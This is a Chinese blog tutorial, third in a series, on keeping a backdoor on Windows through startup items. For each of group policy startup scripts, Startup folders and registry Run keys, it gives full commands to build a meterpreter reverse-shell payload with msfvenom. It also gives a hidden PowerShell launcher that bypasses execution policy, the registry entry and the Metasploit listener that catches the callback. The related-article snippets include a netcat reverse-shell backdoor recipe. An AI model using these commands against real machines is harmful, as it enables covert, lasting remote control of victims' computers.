操作系统权限维持(三)之Windows系统-启动项维持后门

最新推荐文章于 2024-02-11 23:26:41 发布
最新推荐文章于 2024-02-11 23:26:41 发布
阅读量1.2k 收藏 4
点赞数 2
分类专栏: 操作系统权限维持 文章标签: windows 网络安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129775496
版权
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门

启动项维持后门

启动项

启动项,操作系统在启动的时候,自动加载了很多程序。会在前台或者后台运行,进程表中出现了很多的进程。也许有病毒或木马在自启动行列。

添加启动项的方式:
1、组策略
2、启动文件夹
3、注册表

组策略

可以通过利用组策略开机启动脚本

1、在运行框中输入 “gpedit.msc ”,打开组策略

在这里插入图片描述

2、在【计算机配置】->【在Windows设置】->【脚本(启动/关机)】双击【启动】就可以进行设置

在这里插入图片描述

选择在这里要添加的脚本,当Windows机器系统每次重启之后,就会去运行在这里的脚本文件

3、选择要添加的脚本或者PowerShell

机器名IP
Kali192.168.52.130
Win10192.168.52.131

用msf生成一个powershell的木马

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f psh -o shell.ps1

在这里插入图片描述

上传木马文件到目标机器上

创建一个1.bat脚本,并且添加到组策略【脚本】中

在这里插入图片描述

bat脚本内容如下:

@echo off
powershell.exe ­-w hidden ­-ExecutionPolicy Bypass ­-NoExit ­-File C:\Users\Administart\Desktop\shell.ps1
exit

kali运行msf进行监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述

重启Win10机器,win10机器上线

在这里插入图片描述

启动文件夹

启动文件夹 里面的文件可以会在开机的时候自动启动。通过开始菜单——所有程序——启动 这个文件夹内,可以将程序开机自动启动

启动文件夹:

C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限

组策略脚本启动文件夹:

C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown
C:\Windows\System32\GroupPolicy\User\Scripts\Logon
C:\Windows\System32\GroupPolicy\User\Scripts\Logoff

生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

在这里插入图片描述

我们将我们要运行的恶意脚本上传到目标服务器上的启动项文件夹下

在这里插入图片描述

kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述

Win10机器重启,靶机上线

在这里插入图片描述

注册表

注册表(Registry,繁体中文版Windows操作系统称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息

打开注册表

win+r输入regedit

在这里插入图片描述

以下的注册表路径都是注册表的启动项

# HKEY_LOCAL_MACHINE类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
# HKEY_CURRENT_USER类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

我们拿其中一个做为列子

在这里插入图片描述

msf生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

在这里插入图片描述
将木马文件上传至目标服务器

使用reg add 命令进行添加

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Users\Administart\Desktop\shell.exe"

在这里插入图片描述
kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述

重启Win10机器,靶机上线

在这里插入图片描述

千负
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali linux渗透测试系列————32、Kali linux 维持访问之操作系统后门
Fly_鹏程万里
05-16 2212
操作系统后门简单来说,所谓后门(backdoor),就是绕过目标系统安全控制体系的正规用户认证过程而维持我们队目标系统的控制权,以及隐匿我们控制行为的方法。CymothoaCymothoa是一款可以将ShellCode注入到现有进程(插入进程)的后门工具。借助这种注入手段,它能够把ShellCode伪装成常规程序。他说注入的后门程序应当能够与贝注入的程序(进程)共存,以避免被管理或维护人员怀疑。将...
metasploit的模块构成及功能分析
xysoul的专栏
04-07 1万+
metasploit的模块构成及功能分析 今天我们介绍一下metasploit的基础架构和 市面上介绍metasploit的书不少,网上metasploit的使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。 exploit@ubuntu:/pentest/f
php-msf 负载均衡,Metasploit常用操作命令
weixin_30227565的博客
03-26 183
0x00 简述0x01基本操作1.启动MSF这里用的是kali里面的msf,需要开启msf依赖的数据库为PostgreSQL:service postgresql start# 启动 postgresql数据库msfconsole# 启动msf这样就算是启动成功了,左下角会变成msf >。2.配置和生成木马在kali下用ifconfig查询当前攻击机的ip,用于生成木马和配置监听。ifcon...
WIN10设置自启动脚本
weixin_56382610的博客
03-20 4928
刚想设置一个笔记本热点开机自启的操作 上网查询后发现需先把脚本文件放在C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup 目录下 1)而在我的WIN10系统中开始时并为找到该目录 所以我选择了使用WIN+R运行窗口调用命令来打开系统启动文件夹 命令为: shell:Common Startup //注意:此处还有另外一个命令 : shell:startup 为打开用户启动文件夹 前者为系统启动文件夹,两者起到的作用不一样,如果系统有admi.
Windows通过组策略设置开机自启动脚本
热门推荐
kongxx的专栏
06-08 1万+
首先创建一个启动脚本 init.bat,内容如下: time /t >> c:\test\test.log echo %COMPUTERNAME% >> c:\test\test.log echo %USERNAME% >> c:\test\test.log 然后将此文件放入 C:\Windows\System32\GroupPolicy\Machine...
【内网安全】——Windows权限维持
Demo不是emo的博客
02-19 2819
Windows权限维持姿势汇总
Windows系统之本地组策略设置开机自启动脚本
青柚的博客
04-23 4817
实验环境: Windows 7(虚拟机) 实验目的: 写一个简单脚本,使其可以在系统开机时自动运行 实验步骤: 在c盘下新建test目录,编辑脚本如下,保存为demo1.bat,以管理员身份运行一下 将demo1.bat脚本添加到本地组策略编辑器的如下位置: 设置管理模板中系统,将红框中双击打开,改成开启模式 重启计算机,查看C盘test目录下变化 可以看到在目录中...
windows通过bat脚本设置服务开机启动
weixin_33696106的博客
10-21 3804
windows通过bat脚本设置服务开机启动一实验目的要实现apache-activemq-5.14.1-bin、apache-tomcat-7.0.81、reids程序能开机自动启动,防止设备断电后需要人去启动程序。二实验过程1 在windows 7 编写脚本脚本一 boot_start.bat:rem ******************************...
windows脚本】组策略\关机脚本
sunriver2000的专栏
03-17 6751
环境 系统:win10_x64 概述 组策略中添加关机前运行脚本。下面教程是:关闭windows系统前,自动备份windows日志至e盘。 步骤 1、快捷方式 win+R 启动 运行,输入gpedit.msc调出本地组策略。 2、右键 关机,选择 属性。 3、点击 添加,增加关机时执行的脚本。 4、点选确定,完成设置。 5、自动备份windows日志至e盘的脚本。 @echo off chcp 65001 copy C:\Windows..
windows配置开机自启动软件或脚本
最新发布
xuchaoxin1375的博客
02-11 2611
开发windows 应用中相关api。可以配置权限等,操作丰富。
X-Scan v3.1
10-22
采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备...
X-Scan
04-04
功能简介: <br> 采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用...
x-scan v3.3 GUI
04-25
扫描内容包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等二十几个大类。对于多数已知漏洞,我们给出了相应的漏洞描述、解决方案及详细描述链接,其它...
强大的扫描工具x-scan
11-13
务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等 二十几个大类。对于多数已知漏洞,我们给出了相应的漏洞描述、解决方案及详细描述链接,其它漏洞资 料正在进一步...
x-SCAN -V3.3-CN.
01-16
扫描内容包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等二十几个大类。对于多数已知漏洞,我们给出了相应的漏洞描述、解决方案及详细描述链接,其它...
操作系统权限维持(五)之Windows系统-系统服务维持后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-26 624
能够创建在操作系统自己的 Windows 会话中可长时间运行的可执行应用程序。这些服务可以在计算机启动时自动启动,可以暂停和重新启动而且不显示任何用户界面。sc description “test” “test” #设置这个服务为自动启动。net start “test” #启动服务。sc description “test” “test” #设置服务的描述字符串。我们将我们的恶意文件上传到目标服务器上。2、查看服务是否已经创建。
Windows中通过组策略设置开机自启动脚本
橘子女侠
03-06 1万+
实验环境:win7虚拟机; 实验目的:在win7虚拟机上写一个简单的脚本,设置开机(切换账户)时自启动该脚本,并将结果写进日志中; 实验步骤: 1. 进入win7虚拟机,打开本地组策略管理,可以发现有两个配置,一个是计算机配置,里面有个脚本(启动/关机); 另一个是用户配置,里面有个脚本(登录/注销),那么我们该去修改哪一个配置呢,可以让脚本开机自启动。 2. 针对上述问题,我们...
windows权限维持
qq_44704184的博客
07-07 455
权限维持
Msfvenonm生成后门木马
谢公子的博客
11-08 9452
在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。 Msfvenom –p (- -payload-opti...
kali linux权限维持,权限维持-NC后门
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统维持其访问权限。其中一个方法是使用NC后门。 NC后门是一种基于Netcat的后门,它允许攻击者在被攻击系统上远程执行命令。以下是在Kali Linux中创建NC后门的步骤: 1. 在Kali Linux中打开终端,并输入以下命令来生成一个反向Shell: ``` msfvenom -p cmd/unix/reverse_netcat lhost=<攻击者IP> lport=<攻击者端口> -f raw > nc_backdoor ``` 2. 接下来,使用以下命令将生成的反向Shell作为后门上传到受攻击系统: ``` nc -nv <受攻击系统IP> <受攻击系统端口> < nc_backdoor ``` 3. 等待受攻击系统连接到攻击者的系统,然后使用以下命令打开一个监听器: ``` nc -nlvp <攻击者端口> ``` 4. 当受攻击系统连接到攻击者的系统时,攻击者将获得一个Shell,可以在其中执行任意命令。 请注意,NC后门只是权限维持的一种方法,攻击者可能会使用其他技术来维持其访问权限,因此在Kali Linux中学习权限维持是至关重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

千负

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值